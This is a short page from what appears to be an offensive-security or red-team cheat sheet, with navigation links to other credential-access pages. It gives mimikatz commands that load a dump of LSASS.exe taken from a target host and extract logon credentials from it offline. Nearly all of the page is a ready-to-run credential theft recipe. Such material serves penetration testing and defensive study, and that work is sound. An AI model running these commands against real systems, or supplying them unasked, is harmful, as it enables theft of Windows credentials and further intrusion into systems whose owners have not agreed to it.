search

Extract credentials from LSASS dump

hashtag
Mimikatz

Following extracting a dump of LSASS.exe from the target host, use mimikatz to extract credentials offline.

> mimikatz.exe #Open mimikatz
> sekurlsa::minidump {Path]\lsass.DMP #Set context to dump
> sekurlsa::logonpasswords #extract credentials

hashtag

PreviousCredential AccessNextExtract credentials from registry hives

Last updated

Was this helpful?